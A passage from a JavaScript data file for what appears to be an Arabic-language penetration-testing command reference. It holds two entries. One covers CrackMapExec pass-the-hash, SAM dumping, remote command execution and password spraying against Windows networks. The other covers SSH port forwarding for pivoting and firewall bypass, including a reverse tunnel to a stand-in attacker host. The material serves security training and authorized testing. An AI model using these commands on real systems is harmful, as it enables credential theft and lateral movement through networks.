  desc: `CrackMapExec مع Pass-the-Hash يُتيح المصادقة على أجهزة Windows بـ NTLM Hash بدون معرفة كلمة المرور. يُستخدم للتحرك الجانبي في بيئات Active Directory.`,
  options: [
    { flag: 'smb TARGET', desc: 'الهدف (IP أو نطاق)' },
    { flag: '-u USER', desc: 'اسم المستخدم' },
    { flag: '-H HASH', desc: 'NTLM Hash' },
    { flag: '--sam', desc: 'تفريغ SAM Database' },
    { flag: '--shares', desc: 'قائمة الـ Shares' },
    { flag: '-x "CMD"', desc: 'تنفيذ أمر Windows' },
  ],
  examples: [
    { cmd: 'crackmapexec smb 192.168.1.0/24 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:NTLM_HASH', desc: 'Pass-the-Hash على شبكة' },
    { cmd: 'crackmapexec smb 192.168.1.10 -u admin -H NTLM_HASH --sam', desc: 'تفريغ SAM' },
    { cmd: 'crackmapexec smb 192.168.1.10 -u admin -H NTLM_HASH -x "whoami"', desc: 'تنفيذ أمر' },
    { cmd: 'crackmapexec smb 192.168.1.0/24 -u users.txt -p passwords.txt', desc: 'Password Spraying' },
  ],
  tips: '💡 (Pwned!) في الناتج يعني نجحت المصادقة.',
  related: ['impacket', 'mimikatz', 'bloodhound-python'],
},
{
  id: 950, name: 'port-forwarding', cat: 'network', level: 'advanced',
  syntax: 'ssh -L LOCAL:TARGET:PORT user@JUMP',
  short: 'إعادة توجيه المنافذ والـ Tunneling',
  desc: `Port Forwarding عبر SSH لنفق حركة الشبكة عبر خوادم وسيطة. يُستخدم للوصول لخدمات داخلية، تجاوز الجدران النارية، والـ Pivoting في الشبكات.`,
  options: [
    { flag: '-L PORT:HOST:RPORT', desc: 'Local Port Forwarding' },
    { flag: '-R RPORT:HOST:PORT', desc: 'Remote Port Forwarding' },
    { flag: '-D PORT', desc: 'SOCKS Proxy ديناميكي' },
    { flag: '-N', desc: 'بدون تنفيذ أوامر (Tunneling فقط)' },
    { flag: '-f', desc: 'تشغيل في الخلفية' },
  ],
  examples: [
    { cmd: 'ssh -L 3306:192.168.100.10:3306 user@jump-server -N -f', desc: 'الوصول لـ MySQL الداخلي' },
    { cmd: 'ssh -R 4444:localhost:4444 attacker@attacker.com -N', desc: 'Reverse Tunnel للاستماع' },
    { cmd: 'ssh -D 9050 user@pivot-host -N -f && proxychains nmap -sT INTERNAL_IP', desc: 'SOCKS Proxy + Proxychains' },
    { cmd: 'ssh -L 8080:webapp.internal:80 user@pivot-server', desc: 'الوصول لتطبيق داخلي' },
  ],
  tips: '💡 -N -f يُشغّل الـ Tunnel في الخلفية بدون shell.',
  related: ['proxychains', 'chisel', 'ligolo-ng'],
},

]; // END CMD_PART9

window.CMD_PART9 = CMD_PART9;
console.log(`✅ CMD_PART9 loaded: ${CMD_PART9.length} commands`);
